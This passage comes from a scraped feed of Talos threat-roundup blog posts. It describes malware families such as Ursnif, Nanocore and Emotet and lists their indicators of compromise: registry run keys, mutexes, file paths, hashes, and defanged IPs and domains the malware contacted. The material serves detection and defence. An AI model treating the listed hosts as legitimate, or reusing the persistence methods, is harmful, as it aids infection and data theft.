\\- (90) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (89) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nFusion adware detected \\- (43) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \nReverse http payload detected \\- (33) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nDealply adware detected \\- (31) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \n \n", "cvss3": {}, "published": "2019-11-08T14:31:14", "type": "talosblog", "title": "Threat Roundup for November 1 to November 8", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2019-11-08T14:31:14", "id": "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/C8d5TejfTdU/threat-roundup-1101-1108.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-20T19:52:49", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 13 and Sept. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d84d64770d43.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Ursnif-7171615-0 | Dropper | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \nWin.Malware.Zusy-7171614-1 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Malware.Nanocore-7171596-1 | Malware | Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes. \nWin.Malware.Emotet-7171351-0 | Malware | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019. \nWin.Trojan.XtremeRAT-7170522-1 | Trojan | XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs. \nWin.Downloader.Upatre-7170342-1 | Downloader | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. \nWin.Trojan.Gh0stRAT-7170222-1 | Trojan | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nWin.Packed.Blackshades-7168564-1 | Packed | Blackshades is a prevalent trojan with many capabilities including logging keystrokes, recording video from webcams, and downloading and executing additional malware. \nWin.Ransomware.Cerber-7168312-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns this is no longer the case. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Ursnif-7171615-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IAM \nValue Name: Server ID ` | 20 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: appmmgmt ` | 20 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Install ` | 20 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Scr ` | 20 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 20 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Temp ` | 20 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 20 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 20 \nMutexes | Occurrences \n---|--- \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 20 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 20 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 20 \n`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 20 \n`{5B703C72-FEE9-4509-E0BF-12491463668D}` | 20 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]20[.]0[.]85` | 10 \n`104[.]20[.]1[.]85` | 10 \n`216[.]218[.]185[.]162` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]ietf[.]org` | 20 \n`networkinpreinformation[.]in` | 20 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1lcuq8ab.default\\prefs.js` | 20 \n`\\{4BC230AC-2EB3-B560-90AF-42B9C45396FD}` | 20 \n`%APPDATA%\\ds32mapi` | 20 \n`%APPDATA%\\ds32mapi\\dhcpxva2.exe` | 20 \n`%TEMP%\\<random, matching [A-F0-9]{3,4}>` | 20 \n`%TEMP%\\<random, matching [A-F0-9]{3,4}\\[A-F0-9]{2,4}>.bat` | 20 \n \n#### File Hashes\n\n` 11319f1628f825ee4d742eba134c1ef13f8c1a8347ecc58c9307631b1cf976f9 294b4d3a2a266b214d08237057231398e90db1c615470ed79e965ac2cf2f3f41 3828b71130a42ba1300b528c38d29217adbea7439f125a1ad8ccdaba210fa8f1 410391bb11c0ba164309a084cdcde503a9d88eac9cff7db37c1bb093e8e28f35 46b011edbfc2c0bc67f2e0220c475d78d26d792b16b66dbebef5b21c4a8b0f9e 7712f643f1f23f42e2bb3aa8de85f79641b4e8217b6411729f1edfa59057821a 8cb87415a2b184915ce8fd746e9322e4ffceb01c3f92ea0399c94c65394418fd 9046f36247c7cae4170c0e96c5e7e977ee8a3080ca8bcad90082be29684e4469 9a77b01056bd9fad89171f8917305ad10fa10bd38dac4646de194bd24b8e6894 a017725c2c204c738d0f50f60954d5450102e4414508493a704303ae8f6e7513 bb2cede8c20d3b8a4b404d153dcfcd3076d24e11a5c6d83e6a28b1de92db8c1f c34de7caf7fcda02d8c6de4cdbc7e92f16111e7de26b353f4025f4f16b21fa30 c611a64861e798aabf93ae732a457ff451c9deeabb6d63ee7dfd543ad084e6af c6ed641a2900c11e90c547a79c2e3a01dcb5d8dab1f8b59ee086c06f0375c566 d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69 d8916bb5c067fb78f96cad273e79e71c642040f81c9430c6c5ed852f0fe028ba da953a7b6829d0bf48220aed2f4c4b7498bba47d451f6b9065f6b302ef595da7 deb5817310aafedceddcab3d9ec44728aa46d68f840f177369cd717824936f58 ed12000dfd566a0b18e5fe8789bdcb2a2d121556445ac1cd4506f0aa4de6bb2a f4f92fe38729a0c7b2378e2c8c0970ce7ebd18590b59b57c2134e4021fec1a1b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-b-mSpt7yJ8Q/XYTrAo4ZMeI/AAAAAAAACow/TO0GR_afZbgMYyTEPawl5n2CBXzm3rkmgCLcBGAsYHQ/s1600/d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-3oRsiSrXwdg/XYTrEVsIHRI/AAAAAAAACo0/_MGHzsFbeEEESWDFRKCTr1sspVj0QIjzwCLcBGAsYHQ/s1600/d24a338a3d34c23ce0f7e053d9b3f7a5d442ce2330ed67887c45ce94a683ff69_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Zusy-7171614-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: DA81EF4C ` | 8 \nMutexes | Occurrences \n---|--- \n`DA81EF4C` | 11 \n`\\BaseNamedObjects\\7E1FD194` | 7 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]218[.]185[.]162` | 7 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`insamertojertoq[.]cc` | 11 \n`yxjsibeugmmj[.]com` | 7 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\AppData\\LocalLow\\DA81EF4C` | 8 \n`%APPDATA%\\DA81EF4C` | 8 \n`%APPDATA%\\DA81EF4C\\bin.exe` | 8 \n`%APPDATA%\\7E1FD194\\bin.exe` | 7 \n \n#### File Hashes\n\n` 08663c9807b4d858fece615d7e7f132379a7c5652cacbf6584e9adbfd3b6654e 200867228d35c8f4cef7a014221e41c3232fde37f9119c8fa8d30d1121542002 32d41afc1fa28125eb77360dc293184ab6c56ad4259740fef05649f1fcefa82a 3fb0877ce9376e5756ccc847681ccd20a72673655c24814e879556d5ea3e7283 40f210bce6a972939fa3b6874d73d6fb96c654d51cc98464ef87df6002f69f21 a0c05cd49cfd545f35985f45d386a7efcc745a3f87a759b3a94e0dcf864fa60e a2312f676b9b508693f3605549b8ff33286ad61511f4a0a589ef5abeb125b24d aa658c20abd212e39434eb31193c32f09ad39454fa88e242976b619f0681d825 ba39439230cdae8c0f0777cb5a8c0d78a825e4a2820f5da439b2f1ce0d4f3522 bd672bc43098f150874d6d691465eaea12314cb9134deec98525c39cce699fb8 d38a938e9a36c1cdcc1bbe2cf8a5da54b7572a94a37e1b0c0911b6d77d975f0a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-EjyKxcTCvEk/XYTt5S4XwtI/AAAAAAAACpA/jExQSiko3hE89N6Roy2TZnc9X32uCJh6wCLcBGAsYHQ/s1600/d38a938e9a36c1cdcc1bbe2cf8a5da54b7572a94a37e1b0c0911b6d77d975f0a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KcZ1YZKMKCQ/XYTt9TFmjvI/AAAAAAAACpE/aJCRHEVaXO0ayiZk4lzlpwRA4pkyhZQbQCLcBGAsYHQ/s1600/bd672bc43098f150874d6d691465eaea12314cb9134deec98525c39cce699fb8_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ojlkO1q4uok/XYTuU8gXWaI/AAAAAAAACpQ/oBro8khmTP4JG3hztrSXI54DWeGk6-wzgCLcBGAsYHQ/s1600/611775ea338d98e74f242e43456f4f4e1e35c9f95667c202ff8369b478e2ea24_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nanocore-7171596-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: AGP Manager ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Form1staf ` | 25 \nMutexes | Occurrences \n---|--- \n`Global\\{d7ce90e9-f292-46be-8e05-be37399391d6}` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`185[.]244[.]31[.]232` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`kennethecheazu[.]ddns[.]net` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\win.ini` | 25 \n`%ProgramFiles(x86)%\\AGP Manager` | 25 \n`%ProgramFiles(x86)%\\AGP Manager\\agpmgr.exe` | 25 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5` | 25 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs` | 25 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\Logs\\Administrator` | 25 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\run.dat` | 25 \n`%APPDATA%\\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\\AGP Manager\\agpmgr.exe` | 25 \n`%TEMP%\\Form1TIPPE.exe` | 25 \n`%TEMP%\\Form1TIPPE.vbs` | 25 \n`%APPDATA%\\8F793A96-DA80-4751-83F9-B23D8B735FB1\\run.dat` | 18 \n`%ProgramFiles%\\SCSI Host\\scsihost.exe` | 18 \n \n#### File Hashes\n\n` 186e0067550d5d1833c08c7dfd7d91e71d4d5e7d426ef3c7d1edce0554c6424c 202203455899333d624e633917a16b94ddf96eb6a03f284074aab4c1ed0c2218 3bb79bf9626bcf40d81afc303045cb4eb4267ffedee15840179aec2c50eeb82c 4c41af943d2a84a6644933e35e96342dd6195b7b9a33f6fb68c6b92949018e0a 5a1713269673c62544ea6f2a2b266d5df4ed331f1570b0dfc4aa33b3e79c5ce5 601e562e6ea29842ad3ddb246ad5f45250641d2502178c476bbefa19b3acb4e1 6d9d22a3cd4855e3673acbee8619ed213b0e330e6a4560976dda878b5101daec 73470e418c1a73792c06354c7b6d43b615d7ab246e0cff0d5dffbb2725bbfb64 76399c26a09d5953f2349c2c529fc74344160fbc639089dcab56c8409fe2bab5 8f3b8987dd405be851f06d6589ac9f9b9669ff60f5ca29e5eaa698fdd59259ef 8f54b0cb0c575486dd8ea255400b96c0d9c5f48cdf4023f6ffea59004847b627 973e1c1d3d264e764f374dc679852f27913f5afce497fa4d605118ab4e8e41d2 99f095cbbb7919e8fff151eb5175de2680b26dc94f91806343a2b48fce853f8a b46d3a615cc5d6f7ebd553c36edb963aacca5f98a271a1b91411b0b2254d4c64 c33f9cdc0fb36fd7147c15adcd46ab375138f87defedee87600270530380fbbb c4b21c6b8d558fab52a7035e290050132a3011bca864357bfdca398e61ae0ee8 ca9bec90dc6c5084d486e1b19870a9faf0d8f2571802abd08d8156a99eb1d249 cfc11408c01c5fd5eea0f19fca3a6e761d12f2173b6b3c1fd992bb7127e407a8 d1bb9db8ba25c30346a47d50956f71de7015488d8a86630bd18740df485d46fd e3baec6c7f8bc621d76b4d928e7fe3738b9703d7886a1e5ed7968700c3907ce6 ea5c81219c7ff4e8a9fce2aaf6e553a1aa5fdfb59a19d427acd66d08e82306e2 edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1 f6e98bf8216f833b1dd152150e7155c0c639d6a0323d8f7d738bd27673f5ce1b fa32101dcf6a77b32d23cc08ccdff496442b983e4233bed1f4e7d6ad0a4d8f8c fc13c2128949b11b45166489ff26970989d4dc12a456f22cbad00847c069a4a0 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--z03_ujWRq4/XYTvfYdmahI/AAAAAAAACpc/9SlCE3Y7uKUUAOCj4w3d90NB02qf3v1hACLcBGAsYHQ/s1600/edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-JixcRsaNmps/XYTvjdYOBZI/AAAAAAAACpg/5U2cfc-sLF4IMY_-PgWhh5kYTPPRdub4ACLcBGAsYHQ/s1600/edcfb40ef3fbe25d5ea5e7606933277b35924205c67fc8898065ad9ca26354a1_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Emotet-7171351-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionReason ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecision ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadNetworkName ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDetectedUrl ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\CONTENT \nValue Name: CachePrefix ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\COOKIES \nValue Name: CachePrefix ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\HISTORY \nValue Name: CachePrefix ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED \nValue Name: ErrorControl ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED \nValue Name: ImagePath ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED \nValue Name: DisplayName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED \nValue Name: WOW64 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED \nValue Name: ObjectName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STARTEDTURNED ` | 18 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\84-62-7E-AD-21-80 \nValue Name: WpadDecisionReason ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\84-62-7E-AD-21-80 \nValue Name: WpadDecision ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\84-62-7E-AD-21-80 \nValue Name: WpadDetectedUrl ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\96-2B-A6-19-07-4C \nValue Name: WpadDecisionReason ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\96-2B-A6-19-07-4C \nValue Name: WpadDecision ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 18 \n`Global\\M98B68E3C` | 18 \n`PEM19C` | 18 \n`\\BaseNamedObjects\\PEM570` | 18 \n`PEM748` | 17 \n`\\BaseNamedObjects\\Global\\M3C28B0E4` | 14 \n`\\BaseNamedObjects\\PEM298` | 14 \n`\\BaseNamedObjects\\Global\\I3C28B0E4` | 14 \n`PEM4A0` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`104[.]236[.]185[.]25` | 18 \n`82[.]78[.]228[.]57` | 18 \n`187[.]207[.]188[.]248` | 18 \n`211[.]229[.]116[.]97` | 18 \n`190[.]146[.]86[.]180` | 4 \n`190[.]117[.]206[.]153` | 4 \n`186[.]3[.]188[.]74` | 1 \n`190[.]146[.]214[.]85` | 1 \n`190[.]15[.]198[.]47` | 1 \n`187[.]188[.]166[.]192` | 1 \n`88[.]215[.]2[.]29` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\Preferred` | 18 \n`%ProgramData%\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 18 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 18 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\a07db9f3-b1b9-4044-8e88-f6c8d68fdc7a` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\f3586ead-3071-4253-8613-c59bb06aee08` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-aa11-7d33abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-8a10-4233abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-9a1c-4d33abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\f3586ead-3071-4253-b610-299ab06aee08` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-8a12-7333abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-9a13-7333abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-9a13-4d33abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-8a10-f332abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\a07db9f3-b1b9-4044-8e87-cac8d68fdc7a` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-8a1c-f332abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\f3586ead-3071-4253-961f-f89bb06aee08` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-aa1f-7833abe498b7` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\a07db9f3-b1b9-4044-8e89-c6c8d68fdc7a` | 1 \n`%System32%\\Microsoft\\Protect\\S-1-5-18\\User\\aa4abc56-c89f-45fc-ba10-4133abe498b7` | 1 \n \n#### File Hashes\n\n` 5c5acd7e82fb19bfa8a9759c1fc51e93acffb579661fc9b4455fa2f87fd05089 77cbf599e26ac6f094a75c9f3c5d15e4b53bcf9415ddecaa6d91854f16c3b19d b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088 c24216d6f195da529874a5db11c969abeadf873379c79a92759ad7378811b2e5 c379f58194bd325c7a5c95dd0d764f10781f4380586853bfe11a5ceb1d3e5aeb cc848b89bb84b0c6ae96d7191c415dcacf542aed4b2a610a0cf6b77047d7b3ef d626aacbbd26f0c7d5baee7fd6e49ee8ae2aed7c6352d39ac25134e9985400c6 d8199db09a16c0f851cb3dde4fc06183d23650295836d1a24c4d868af5acc7e3 d86584f92b6af0bfde4a4720878d5ad64f6d8c295b61f5cc345b2fcfa952758e de3841cd0ab0001fdfd28a4f3fd15d5d20c09629f7857642083e95fa9b716364 e4edfd2654acbab633fbd862641abd852cf3568614b7596373c6c4951e063998 ee21917b1596852818813250aa9a5ee37e87f7ca43120e17f09f940d058c1557 f2dcd182c3a281ee4b0026f6267fb1fafd27ae3f656941464363e4d1c0d68a28 f60672c54ec0ba38a7c7200f75859b811e1c589f84c693a82125350f89d15c94 f75984cfa2bb3c33629e71565da34a8af4b087acf91a19b1dca7481d7adff22b fcb2b44ce9f1646c1f33a82ed4afa47874166ca0c3842773d1e64fbe603de847 fce9a64d721296eaacbc034526c0719e5628575b25456436664d69cfc4155485 fe7983bcbdb91a3cfa96e68bc57ae13007041e7f048f92372a6488da79c93af7 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-lYKKKXq8ibo/XYTwEyE6dDI/AAAAAAAACps/nHogjt-idtoSahFPfMXF7mVNjorhRpi9QCLcBGAsYHQ/s1600/b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-EGkFh1UJc7U/XYTwJO65uxI/AAAAAAAACpw/jW9dq9z3ajMGvYznKgqO64yeS1r9IZBBwCLcBGAsYHQ/s1600/b681565893796b7147bdeeabae464bf847ac52118ba86752f9b4e31497f7d088_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.XtremeRAT-7170522-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HKLM ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HKCU ` | 15 \n`<HKCU>\\SOFTWARE\\<random, matching '[a-zA-Z0-9]{5,9}'> \nValue Name: InstalledServer ` | 14 \n`<HKCU>\\SOFTWARE\\<random, matching '[a-zA-Z0-9]{5,9}'> ` | 14 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED 